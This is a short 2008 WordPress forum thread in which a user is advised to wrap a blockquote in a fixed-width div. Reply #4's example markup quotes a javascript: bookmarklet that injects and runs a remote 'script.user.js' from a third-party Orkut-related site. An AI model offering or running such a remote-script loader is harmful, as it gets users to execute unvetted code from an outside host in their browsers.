How to fix this?

Discussion in 'WordPress' started by Moin.Anjum, Jan 15, 2008.

  1. #1
    Moin.Anjum, Jan 15, 2008 IP
  2. Dondon2d

    Dondon2d Peon

    Messages:
    3,193
    Likes Received:
    146
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Easiest way is to place the blockquote in a <div> and set a fixed width on that div.
     
    Dondon2d, Jan 15, 2008 IP
  3. Moin.Anjum

    Moin.Anjum Well-Known Member

    Messages:
    161
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #3
    Thanks, can you give me an example though?
     
    Moin.Anjum, Jan 15, 2008 IP
  4. Dondon2d

    Dondon2d Peon

    Messages:
    3,193
    Likes Received:
    146
    Best Answers:
    0
    Trophy Points:
    0
    #4
    <div id="thisone"><blockquote><p> javascript:d=document;c=d.createElement(’script’);d.body.appendChild(c);c.src=’http://www.123orkut.com/script.user.js’;void(0)</p></blockquote></div
    Code (markup):
    Then in your CSS:

    #thisone { width: 300px; }
    Code (markup):
    This is not a perfect code though, it's the easiest way of doing it. No harm in trying. ;)
     
    Dondon2d, Jan 15, 2008 IP
  5. Moin.Anjum

    Moin.Anjum Well-Known Member

    Messages:
    161
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    105
    #5
    Thanks a lot, im going to give it a try :D - sorry for newbness though! Just my 2nd day on wordpress!

    Edit: Didn't work :(
     
    Moin.Anjum, Jan 15, 2008 IP
  6. Dondon2d

    Dondon2d Peon

    Messages:
    3,193
    Likes Received:
    146
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Haha, no one becomes an expert immediately ;) I am a newbie too but who knows the help I gave you works.
     
    Dondon2d, Jan 15, 2008 IP